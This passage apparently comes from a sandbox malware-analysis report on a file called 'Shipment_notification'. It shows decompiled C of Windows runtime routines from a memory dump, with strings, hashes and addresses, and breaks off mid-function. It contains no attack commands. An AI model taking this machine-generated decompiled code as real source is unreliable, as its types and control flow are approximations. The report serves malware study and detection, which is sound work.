                                                                                					L5:
                                                                                					return _t73;
                                                                                				} else {
                                                                                					E01AFEEF0(0x1bd7b60);
                                                                                					_t134 =  *0x1bd7b84; // 0x771a7b80
                                                                                					_t2 = _t174 + 0x24; // 0x24
                                                                                					_t75 = _t2;
                                                                                					if( *_t134 != 0x1bd7b80) {
                                                                                						_push(3);
                                                                                						asm("int 0x29");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						asm("int3");
                                                                                						_push(0x1bd7b60);
                                                                                						_t170 = _v8;
                                                                                						_v28 = 0;
                                                                                						_v40 = 0;
                                                                                						_v24 = 0;
                                                                                						_v17 = 0;
                                                                                						_v32 = 0;
                                                                                						__eflags = _t170 & 0xffff7cf2;
                                                                                						if((_t170 & 0xffff7cf2) != 0) {
                                                                                							L43:
                                                                                							_t77 = 0xc000000d;
                                                                                						} else {
                                                                                							_t79 = _t170 & 0x0000000c;
                                                                                							__eflags = _t79;
                                                                                							if(_t79 != 0) {
                                                                                								__eflags = _t79 - 0xc;
                                                                                								if(_t79 == 0xc) {
                                                                                									goto L43;
                                                                                								} else {
                                                                                									goto L9;
                                                                                								}
                                                                                							} else {
                                                                                								_t170 = _t170 | 0x00000008;
                                                                                								__eflags = _t170;
                                                                                								L9:
                                                                                								_t81 = _t170 & 0x00000300;
                                                                                								__eflags = _t81 - 0x300;
                                                                                								if(_t81 == 0x300) {
                                                                                									goto L43;
                                                                                								} else {
                                                                                									_t138 = _t170 & 0x00000001;
                                                                                									__eflags = _t138;
                                                                                									_v24 = _t138;
                                                                                									if(_t138 != 0) {
                                                                                										__eflags = _t81;
                                                                                										if(_t81 != 0) {
                                                                                											goto L43;
                                                                                										} else {
                                                                                											goto L11;
                                                                                										}
                                                                                									} else {
                                                                                										L11:
                                                                                										_push(_t129);
                                                                                										_t77 = E01AF6D90( &_v20);
                                                                                										_t130 = _t77;
                                                                                										__eflags = _t130;
                                                                                										if(_t130 >= 0) {
                                                                                											_push(_t174);
                                                                                											__eflags = _t170 & 0x00000301;
                                                                                											if((_t170 & 0x00000301) == 0) {
                                                                                												_t176 = _a8;
                                                                                												__eflags = _t176;
                                                                                												if(__eflags == 0) {
                                                                                													L64:
                                                                                													_t83 =  *[fs:0x18];
                                                                                													_t177 = 0;
                                                                                													__eflags =  *(_t83 + 0xfb8);
                                                                                													if( *(_t83 + 0xfb8) != 0) {
                                                                                														E01AF76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                                														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                                													}
                                                                                													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                                													goto L15;
                                                                                												} else {
                                                                                													asm("sbb edx, edx");
                                                                                													_t114 = E01B88938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                                													__eflags = _t114;
                                                                                													if(_t114 < 0) {
                                                                                														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                                														E01AEB150();
                                                                                													}
                                                                                													_t116 = E01B86D81(_t176,  &_v16);
                                                                                													__eflags = _t116;
                                                                                													if(_t116 >= 0) {
                                                                                														__eflags = _v16 - 2;
                                                                                														if(_v16 < 2) {
                                                                                															L56:
                                                                                															_t118 = E01AF75CE(_v20, 5, 0);
                                                                                															__eflags = _t118;
                                                                                															if(_t118 < 0) {
                                                                                																L67:
                                                                                																_t130 = 0xc0000017;
                                                                                																goto L32;
                                                                                															} else {
                                                                                																__eflags = _v12;
                                                                                																if(_v12 == 0) {
                                                                                																	goto L67;
                                                                                																} else {
                                                                                																	_t153 =  *0x1bd8638; // 0x0
                                                                                																	_t122 = L01AF38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                                																	_t154 = _v12;
                                                                                																	_t130 = _t122;
                                                                                																	__eflags = _t130;
                                                                                																	if(_t130 >= 0) {
                                                                                																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                                																		__eflags = _t123;
                                                                                																		if(_t123 != 0) {
                                                                                																			_t155 = _a12;
                                                                                																			__eflags = _t155;
                                                                                																			if(_t155 != 0) {
                                                                                																				 *_t155 = _t123;
                                                                                																			}
                                                                                																			goto L64;
                                                                                																		} else {
                                                                                																			E01AF76E2(_t154);
                                                                                																			goto L41;
                                                                                																		}
                                                                                																	} else {
                                                                                																		E01AF76E2(_t154);
                                                                                																		_t177 = 0;
                                                                                																		goto L18;
                                                                                																	}
                                                                                																}
                                                                                															}
                                                                                														} else {
                                                                                															__eflags =  *_t176;
                                                                                															if( *_t176 != 0) {
                                                                                																goto L56;
                                                                                															} else {
                                                                                																__eflags =  *(_t176 + 2);
                                                                                																if( *(_t176 + 2) == 0) {
                                                                                																	goto L64;
                                                                                																} else {
                                                                                																	goto L56;
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                													} else {
                                                                                														_t130 = 0xc000000d;
                                                                                														goto L32;
                                                                                													}
                                                                                												}
                                                                                												goto L35;
                                                                                											} else {
                                                                                												__eflags = _a8;
                                                                                												if(_a8 != 0) {
                                                                                													_t77 = 0xc000000d;
                                                                                												} else {
                                                                                													_v5 = 1;
                                                                                													L01B1FCE3(_v20, _t170);
                                                                                													_t177 = 0;
                                                                                													__eflags = 0;
                                                                                													L15:
                                                                                													_t85 =  *[fs:0x18];
                                                                                													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                                													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                                														L18:
                                                                                														__eflags = _t130;
                                                                                														if(_t130 != 0) {
                                                                                															goto L32;
                                                                                														} else {
                                                                                															__eflags = _v5 - _t130;
                                                                                															if(_v5 == _t130) {
                                                                                																goto L32;
                                                                                															} else {
                                                                                																_t86 =  *[fs:0x18];
                                                                                																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                                																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                                																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                                																}
                                                                                																__eflags = _t177;
                                                                                																if(_t177 == 0) {
                                                                                																	L31:
                                                                                																	__eflags = 0;
                                                                                																	L01AF70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                                																	goto L32;
                                                                                																} else {
                                                                                																	__eflags = _v24;
                                                                                																	_t91 =  *(_t177 + 0x20);
                                                                                																	if(_v24 != 0) {
                                                                                																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                                																		goto L31;
                                                                                																	} else {
                                                                                																		_t141 = _t91 & 0x00000040;
                                                                                																		__eflags = _t170 & 0x00000100;
                                                                                																		if((_t170 & 0x00000100) == 0) {
                                                                                																			__eflags = _t141;
                                                                                																			if(_t141 == 0) {
                                                                                																				L74:
                                                                                																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                                																				goto L27;
                                                                                																			} else {
                                                                                																				_t177 = E01B1FD22(_t177);
                                                                                																				__eflags = _t177;
                                                                                																				if(_t177 == 0) {
                                                                                																					goto L42;
                                                                                																				} else {
                                                                                																					_t130 = E01B1FD9B(_t177, 0, 4);
                                                                                																					__eflags = _t130;
                                                                                																					if(_t130 != 0) {
                                                                                																						goto L42;
                                                                                																					} else {
                                                                                																						_t68 = _t177 + 0x20;
                                                                                																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                																						__eflags =  *_t68;
                                                                                																						_t91 =  *(_t177 + 0x20);
                                                                                																						goto L74;
                                                                                																					}
                                                                                																				}
                                                                                																			}
                                                                                																			goto L35;
                                                                                																		} else {
                                                                                																			__eflags = _t141;
                                                                                																			if(_t141 != 0) {
                                                                                																				_t177 = E01B1FD22(_t177);
                                                                                																				__eflags = _t177;
                                                                                																				if(_t177 == 0) {
                                                                                																					L42:
                                                                                																					_t77 = 0xc0000001;
                                                                                																					goto L33;
                                                                                																				} else {
                                                                                																					_t130 = E01B1FD9B(_t177, 0, 4);
                                                                                																					__eflags = _t130;
                                                                                																					if(_t130 != 0) {
                                                                                																						goto L42;
                                                                                																					} else {
                                                                                																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                																						_t91 =  *(_t177 + 0x20);
                                                                                																						goto L26;
                                                                                																					}
                                                                                																				}
                                                                                																				goto L35;
                                                                                																			} else {
                                                                                																				L26:
                                                                                																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                                																				__eflags = _t94;
                                                                                																				L27:
                                                                                																				 *(_t177 + 0x20) = _t94;
                                                                                																				__eflags = _t170 & 0x00008000;
                                                                                																				if((_t170 & 0x00008000) != 0) {
                                                                                																					_t95 = _a12;
                                                                                																					__eflags = _t95;
                                                                                																					if(_t95 != 0) {
                                                                                																						_t96 =  *_t95;
                                                                                																						__eflags = _t96;
                                                                                																						if(_t96 != 0) {
                                                                                																							 *((short*)(_t177 + 0x22)) = 0;
                                                                                																							_t40 = _t177 + 0x20;
                                                                                																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                                																							__eflags =  *_t40;
                                                                                																						}
                                                                                																					}
                                                                                																				}
                                                                                																				goto L31;
                                                                                																			}
                                                                                																		}
                                                                                																	}
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                													} else {
                                                                                														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                                														_t106 =  *(_t147 + 0x20);
                                                                                														__eflags = _t106 & 0x00000040;
                                                                                														if((_t106 & 0x00000040) != 0) {
                                                                                															_t147 = E01B1FD22(_t147);
                                                                                															__eflags = _t147;
                                                                                															if(_t147 == 0) {
                                                                                																L41:
                                                                                																_t130 = 0xc0000001;
                                                                                																L32:
                                                                                																_t77 = _t130;
                                                                                																goto L33;
                                                                                															} else {
                                                                                																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                                																_t106 =  *(_t147 + 0x20);
                                                                                																goto L17;
                                                                                															}
                                                                                															goto L35;
                                                                                														} else {
                                                                                															L17:
                                                                                															_t108 = _t106 | 0x00000080;
                                                                                															__eflags = _t108;
                                                                                															 *(_t147 + 0x20) = _t108;
                                                                                															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                                															goto L18;
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                											L33:
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						L35:
                                                                                						return _t77;
                                                                                					} else {
                                                                                						 *_t75 = 0x1bd7b80;
                                                                                						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                                						 *_t134 = _t75;
                                                                                						 *0x1bd7b84 = _t75;
                                                                                						_t73 = E01AFEB70(_t134, 0x1bd7b60);
                                                                                						if( *0x1bd7b20 != 0) {
                                                                                							_t73 =  *( *[fs:0x30] + 0xc);
                                                                                							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                                								_t73 = E01AFFF60( *0x1bd7b20);
                                                                                							}
                                                                                						}
                                                                                						goto L5;
                                                                                					}
                                                                                				}
                                                                                			}


                                                                                Strings
                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 01B5BE0F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                • API String ID: 0-865735534
                                                                                • Opcode ID: f9ad75a6655e48a25d5fcdd1b91ca7dc0613e90183f3e3100cc8ef5423fb3613
                                                                                • Instruction ID: f742eee8bf69f946d6cf5789a78a7d10f19ab147f3dcacd8a9dd86bbc7de6c0f
                                                                                • Opcode Fuzzy Hash: f9ad75a6655e48a25d5fcdd1b91ca7dc0613e90183f3e3100cc8ef5423fb3613
                                                                                • Instruction Fuzzy Hash: D0A11371B006069BEB2DDF68C5507BAB7A5FF48710F4546EDEA06CB684EB30D849DB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 63%
                                                                                			E01AE2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                                				signed char _v8;
                                                                                				signed int _v12;
                                                                                				signed int _v16;
                                                                                				signed int _v20;
                                                                                				signed int _v24;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				signed int _v52;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t55;
                                                                                				signed int _t57;
                                                                                				signed int _t58;
                                                                                				char* _t62;
                                                                                				signed char* _t63;
                                                                                				signed char* _t64;
                                                                                				signed int _t67;
                                                                                				signed int _t72;
                                                                                				signed int _t77;
                                                                                				signed int _t78;
                                                                                				signed int _t88;
                                                                                				intOrPtr _t89;
                                                                                				signed char _t93;
                                                                                				signed int _t97;
                                                                                				signed int _t98;
                                                                                				signed int _t102;
                                                                                				signed int _t103;
                                                                                				intOrPtr _t104;
                                                                                				signed int _t105;
                                                                                				signed int _t106;
                                                                                				signed char _t109;
                                                                                				signed int _t111;
                                                                                				void* _t116;
                                                                                
                                                                                				_t102 = __edi;
                                                                                				_t97 = __edx;
                                                                                				_v12 = _v12 & 0x00000000;
                                                                                				_t55 =  *[fs:0x18];
                                                                                				_t109 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t86 = 0;
                                                                                				_v32 = _t55;
                                                                                				_v24 = 0;
                                                                                				_push(__edi);
                                                                                				if(__ecx == 0x1bd5350) {
                                                                                					_t86 = 1;
                                                                                					_v24 = 1;
                                                                                					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                                				}
                                                                                				_t103 = _t102 | 0xffffffff;
                                                                                				if( *0x1bd7bc8 != 0) {
                                                                                					_push(0xc000004b);
                                                                                					_push(_t103);
                                                                                					E01B297C0();
                                                                                				}
                                                                                				if( *0x1bd79c4 != 0) {
                                                                                					_t57 = 0;
                                                                                				} else {
                                                                                					_t57 = 0x1bd79c8;
                                                                                				}
                                                                                				_v16 = _t57;
                                                                                				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                                					_t93 = _t109;
                                                                                					L23();
                                                                                				}
                                                                                				_t58 =  *_t109;
                                                                                				if(_t58 == _t103) {
                                                                                					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                                					_t58 = _t103;
                                                                                					if(__eflags == 0) {
                                                                                						_t93 = _t109;
                                                                                						L01B11624(_t86, __eflags);
                                                                                						_t58 =  *_t109;
                                                                                					}
                                                                                				}
                                                                                				_v20 = _v20 & 0x00000000;
                                                                                				if(_t58 != _t103) {
                                                                                					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                                				}
                                                                                				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                                				_t88 = _v16;
                                                                                				_v28 = _t104;
                                                                                				L9:
                                                                                				while(1) {
                                                                                					if(E01B07D50() != 0) {
                                                                                						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                                					} else {
                                                                                						_t62 = 0x7ffe0382;
                                                                                					}
                                                                                					if( *_t62 != 0) {
                                                                                						_t63 =  *[fs:0x30];
                                                                                						__eflags = _t63[0x240] & 0x00000002;
                                                                                						if((_t63[0x240] & 0x00000002) != 0) {
                                                                                							_t93 = _t109;
                                                                                							E01B7FE87(_t93);
                                                                                						}
                                                                                					}
                                                                                					if(_t104 != 0xffffffff) {
                                                                                						_push(_t88);
                                                                                						_push(0);
                                                                                						_push(_t104);
                                                                                						_t64 = E01B29520();
                                                                                						goto L15;
                                                                                					} else {
                                                                                						while(1) {
                                                                                							_t97 =  &_v8;
                                                                                							_t64 = E01B1E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                                							if(_t64 == 0x102) {
                                                                                								break;
                                                                                							}
                                                                                							_t93 =  *(_t109 + 4);
                                                                                							_v8 = _t93;
                                                                                							if((_t93 & 0x00000002) != 0) {
                                                                                								continue;
                                                                                							}
                                                                                							L15:
                                                                                							if(_t64 == 0x102) {
                                                                                								break;
                                                                                							}
                                                                                							_t89 = _v24;
                                                                                							if(_t64 < 0) {
                                                                                								L01B3DF30(_t93, _t97, _t64);
                                                                                								_push(_t93);
                                                                                								_t98 = _t97 | 0xffffffff;
                                                                                								__eflags =  *0x1bd6901;
                                                                                								_push(_t109);
                                                                                								_v52 = _t98;
                                                                                								if( *0x1bd6901 != 0) {
                                                                                									_push(0);
                                                                                									_push(1);
                                                                                									_push(0);
                                                                                									_push(0x100003);
                                                                                									_push( &_v12);
                                                                                									_t72 = E01B29980();
                                                                                									__eflags = _t72;
                                                                                									if(_t72 < 0) {
                                                                                										_v12 = _t98 | 0xffffffff;
                                                                                									}
                                                                                								}
                                                                                								asm("lock cmpxchg [ecx], edx");
                                                                                								_t111 = 0;
                                                                                								__eflags = 0;
                                                                                								if(0 != 0) {
                                                                                									__eflags = _v12 - 0xffffffff;
                                                                                									if(_v12 != 0xffffffff) {
                                                                                										_push(_v12);
                                                                                										E01B295D0();
                                                                                									}
                                                                                								} else {
                                                                                									_t111 = _v12;
                                                                                								}
                                                                                								return _t111;
                                                                                							} else {
                                                                                								if(_t89 != 0) {
                                                                                									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                                									_t77 = E01B07D50();
                                                                                									__eflags = _t77;
                                                                                									if(_t77 == 0) {
                                                                                										_t64 = 0x7ffe0384;
                                                                                									} else {
                                                                                										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                									}
                                                                                									__eflags =  *_t64;
                                                                                									if( *_t64 != 0) {
                                                                                										_t64 =  *[fs:0x30];
                                                                                										__eflags = _t64[0x240] & 0x00000004;
                                                                                										if((_t64[0x240] & 0x00000004) != 0) {
                                                                                											_t78 = E01B07D50();
                                                                                											__eflags = _t78;
                                                                                											if(_t78 == 0) {
                                                                                												_t64 = 0x7ffe0385;
                                                                                											} else {
                                                                                												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                											}
                                                                                											__eflags =  *_t64 & 0x00000020;
                                                                                											if(( *_t64 & 0x00000020) != 0) {
                                                                                												_t64 = E01B67016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								return _t64;
                                                                                							}
                                                                                						}
                                                                                						_t97 = _t88;
                                                                                						_t93 = _t109;
                                                                                						E01B7FDDA(_t97, _v12);
                                                                                						_t105 =  *_t109;
                                                                                						_t67 = _v12 + 1;
                                                                                						_v12 = _t67;
                                                                                						__eflags = _t105 - 0xffffffff;
                                                                                						if(_t105 == 0xffffffff) {
                                                                                							_t106 = 0;
                                                                                							__eflags = 0;
                                                                                						} else {
                                                                                							_t106 =  *(_t105 + 0x14);
                                                                                						}
                                                                                						__eflags = _t67 - 2;
                                                                                						if(_t67 > 2) {
                                                                                							__eflags = _t109 - 0x1bd5350;
                                                                                							if(_t109 != 0x1bd5350) {
                                                                                								__eflags = _t106 - _v20;
                                                                                								if(__eflags == 0) {
                                                                                									_t93 = _t109;
                                                                                									E01B7FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_push("RTL: Re-Waiting\n");
                                                                                						_push(0);
                                                                                						_push(0x65);
                                                                                						_v20 = _t106;
                                                                                						E01B75720();
                                                                                						_t104 = _v28;
                                                                                						_t116 = _t116 + 0xc;
                                                                                						continue;
                                                                                					}
                                                                                				}
                                                                                			}




































                                                                                0x01ae2e54
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01ae2e5a
                                                                                0x01ae2e5f
                                                                                0x01ae2e9a
                                                                                0x01ae2ea4
                                                                                0x01ae2ea5
                                                                                0x01ae2ea8
                                                                                0x01ae2eaf
                                                                                0x01ae2eb2
                                                                                0x01ae2eb5
                                                                                0x01b3fae9
                                                                                0x01b3faeb
                                                                                0x01b3faed
                                                                                0x01b3faef
                                                                                0x01b3faf7
                                                                                0x01b3faf8
                                                                                0x01b3fafd
                                                                                0x01b3faff
                                                                                0x01b3fb04
                                                                                0x01b3fb04
                                                                                0x01b3faff
                                                                                0x01ae2ec0
                                                                                0x01ae2ec4
                                                                                0x01ae2ec6
                                                                                0x01ae2ec8
                                                                                0x01b3fb14
                                                                                0x01b3fb18
                                                                                0x01b3fb1e
                                                                                0x01b3fb21
                                                                                0x01b3fb21
                                                                                0x01ae2ece
                                                                                0x01ae2ece
                                                                                0x01ae2ece
                                                                                0x01ae2ed7
                                                                                0x01ae2e61
                                                                                0x01ae2e63
                                                                                0x01b3fa6b
                                                                                0x01b3fa71
                                                                                0x01b3fa76
                                                                                0x01b3fa78
                                                                                0x01b3fa8a
                                                                                0x01b3fa7a
                                                                                0x01b3fa83
                                                                                0x01b3fa83
                                                                                0x01b3fa8f
                                                                                0x01b3fa91
                                                                                0x01b3fa97
                                                                                0x01b3fa9d
                                                                                0x01b3faa4
                                                                                0x01b3faaa
                                                                                0x01b3faaf
                                                                                0x01b3fab1
                                                                                0x01b3fac3
                                                                                0x01b3fab3
                                                                                0x01b3fabc
                                                                                0x01b3fabc
                                                                                0x01b3fac8
                                                                                0x01b3facb
                                                                                0x01b3fadf
                                                                                0x01b3fadf
                                                                                0x01b3facb
                                                                                0x01b3faa4
                                                                                0x01b3fa91
                                                                                0x01ae2e6f
                                                                                0x01ae2e6f
                                                                                0x01ae2e5f
                                                                                0x01b3fa13
                                                                                0x01b3fa15
                                                                                0x01b3fa17
                                                                                0x01b3fa1f
                                                                                0x01b3fa21
                                                                                0x01b3fa22
                                                                                0x01b3fa25
                                                                                0x01b3fa28
                                                                                0x01b3fa2f
                                                                                0x01b3fa2f
                                                                                0x01b3fa2a
                                                                                0x01b3fa2a
                                                                                0x01b3fa2a
                                                                                0x01b3fa31
                                                                                0x01b3fa34
                                                                                0x01b3fa36
                                                                                0x01b3fa3c
                                                                                0x01b3fa3e
                                                                                0x01b3fa41
                                                                                0x01b3fa43
                                                                                0x01b3fa45
                                                                                0x01b3fa45
                                                                                0x01b3fa41
                                                                                0x01b3fa3c
                                                                                0x01b3fa4a
                                                                                0x01b3fa4f
                                                                                0x01b3fa51
                                                                                0x01b3fa53
                                                                                0x01b3fa56
                                                                                0x01b3fa5b
                                                                                0x01b3fa5e
                                                                                0x00000000
                                                                                0x01b3fa5e
                                                                                0x01ae2e23

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Re-Waiting
                                                                                • API String ID: 0-316354757
                                                                                • Opcode ID: f71c95e9ea606ca37b7c209278492b1acd01bff181fa4edbbfa47a8501464949
                                                                                • Instruction ID: 7da8f17b3a188c014806801f930ebf8171e98105e30f8e5bfcf429fef11266a8
                                                                                • Opcode Fuzzy Hash: f71c95e9ea606ca37b7c209278492b1acd01bff181fa4edbbfa47a8501464949
                                                                                • Instruction Fuzzy Hash: 84614871E00615AFEB3ADF6CC888B7E7BF9EB84714F1806EAD511972C1DB3499018782
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 80%
                                                                                			E01BB0EA5(void* __ecx, void* __edx) {
                                                                                				signed int _v20;
                                                                                				char _v24;
                                                                                				intOrPtr _v28;
                                                                                				unsigned int _v32;
                                                                                				signed int _v36;
                                                                                				intOrPtr _v40;
                                                                                				char _v44;
                                                                                				intOrPtr _v64;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				signed int _t58;
                                                                                				unsigned int _t60;
                                                                                				intOrPtr _t62;
                                                                                				char* _t67;
                                                                                				char* _t69;
                                                                                				void* _t80;
                                                                                				void* _t83;
                                                                                				intOrPtr _t93;
                                                                                				intOrPtr _t115;
                                                                                				char _t117;
                                                                                				void* _t120;
                                                                                
                                                                                				_t83 = __edx;
                                                                                				_t117 = 0;
                                                                                				_t120 = __ecx;
                                                                                				_v44 = 0;
                                                                                				if(E01BAFF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                                					L24:
                                                                                					_t109 = _v44;
                                                                                					if(_v44 != 0) {
                                                                                						E01BB1074(_t83, _t120, _t109, _t117, _t117);
                                                                                					}
                                                                                					L26:
                                                                                					return _t117;
                                                                                				}
                                                                                				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                				_t5 = _t83 + 1; // 0x1
                                                                                				_v36 = _t5 << 0xc;
                                                                                				_v40 = _t93;
                                                                                				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                                				asm("sbb ebx, ebx");
                                                                                				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                                				if(_t58 != 0) {
                                                                                					_push(0);
                                                                                					_push(0x14);
                                                                                					_push( &_v24);
                                                                                					_push(3);
                                                                                					_push(_t93);
                                                                                					_push(0xffffffff);
                                                                                					_t80 = E01B29730();
                                                                                					_t115 = _v64;
                                                                                					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                                						_push(_t93);
                                                                                						E01BAA80D(_t115, 1, _v20, _t117);
                                                                                						_t83 = 4;
                                                                                					}
                                                                                				}
                                                                                				if(E01BAA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                                					goto L24;
                                                                                				}
                                                                                				_t60 = _v32;
                                                                                				_t97 = (_t60 != 0x100000) + 1;
                                                                                				_t83 = (_v44 -  *0x1bd8b04 >> 0x14) + (_v44 -  *0x1bd8b04 >> 0x14);
                                                                                				_v28 = (_t60 != 0x100000) + 1;
                                                                                				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                                				_v40 = _t62;
                                                                                				if(_t83 >= _t62) {
                                                                                					L10:
                                                                                					asm("lock xadd [eax], ecx");
                                                                                					asm("lock xadd [eax], ecx");
                                                                                					if(E01B07D50() == 0) {
                                                                                						_t67 = 0x7ffe0380;
                                                                                					} else {
                                                                                						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                					}
                                                                                					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                						E01BA138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                                					}
                                                                                					if(E01B07D50() == 0) {
                                                                                						_t69 = 0x7ffe0388;
                                                                                					} else {
                                                                                						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                					}
                                                                                					if( *_t69 != 0) {
                                                                                						L01B9FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                                					}
                                                                                					if(( *0x1bd8724 & 0x00000008) != 0) {
                                                                                						E01BA52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                                					}
                                                                                					_t117 = _v44;
                                                                                					goto L26;
                                                                                				}
                                                                                				while(E01BB15B5(0x1bd8ae4, _t83, _t97, _t97) >= 0) {
                                                                                					_t97 = _v28;
                                                                                					_t83 = _t83 + 2;
                                                                                					if(_t83 < _v40) {
                                                                                						continue;
                                                                                					}
                                                                                					goto L10;
                                                                                				}
                                                                                				goto L24;
                                                                                			}


                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `
                                                                                • API String ID: 0-2679148245
                                                                                • Opcode ID: b81405643fc2a7d4a4ae4c21eb2aa19eb8fdf03e436c5c6226b9073b1b68e8f7
                                                                                • Instruction ID: ef160d0de1fbf72168176d15617d1f44617d7320ce82b76de5014c2042b41ad4
                                                                                • Opcode Fuzzy Hash: b81405643fc2a7d4a4ae4c21eb2aa19eb8fdf03e436c5c6226b9073b1b68e8f7
                                                                                • Instruction Fuzzy Hash: 2E5190713043429FD729EF28D8D4B6BBBE5EB88704F4409ACF58697690D7B1E805C762
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E01B1F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				char* _v20;
                                                                                				intOrPtr _v24;
                                                                                				char _v28;
                                                                                				intOrPtr _v32;
                                                                                				char _v36;
                                                                                				char _v44;
                                                                                				char _v52;
                                                                                				intOrPtr _v56;
                                                                                				char _v60;
                                                                                				intOrPtr _v72;
